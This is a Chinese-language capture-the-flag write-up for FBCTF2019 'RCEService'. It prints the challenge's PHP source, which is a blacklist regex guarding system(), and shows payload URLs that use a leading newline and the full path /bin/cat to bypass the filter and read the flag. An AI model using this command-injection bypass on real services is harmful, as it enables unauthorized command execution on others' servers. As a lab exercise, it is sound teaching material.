[FBCTF2019]RCEService
一看就是很标准的rce题的模样,要求用json传递,查看页面源代码发现参数是cmd
构造ls的json,然后回显了当前目录下的文件,发现只有一个index.php
看到有的师傅wp里写的直接看源码审计,这里其实就是先构造,审计了index.php的源码,然后发现了环境变量,进而找到flag的位置
看页面源码的payload:
http://902101f5-7939-4cb4-a4df-683f733545d7.node4.buuoj.cn/?cmd={%0A%22cmd%22:%20%22/bin/cat%20./index.php%22%0A}
这里学会一个新的修复姿势,后文说,绕过方式就是这个/bin/cat
这里莫名其妙还被火绒给拦截了
页面源码
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
这里其实最重要的点有两个
第一是
putenv('PATH=/home/rceservice/jail');
这里为了避免调用系统命令,就可以临时改环境变量
指定了一个环境变量,也就是cat这个命令是不能直接用的,因为环境变量临时被修改了,所以必须用/bin/cat才可以
第二个就是preg_match()这个函数,它有个特性就是只对第一行正则匹配,可以利用这个特性绕过
%0A是换行符
最终payload:
http://902101f5-7939-4cb4-a4df-683f733545d7.node4.buuoj.cn/?cmd={%0A%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0A}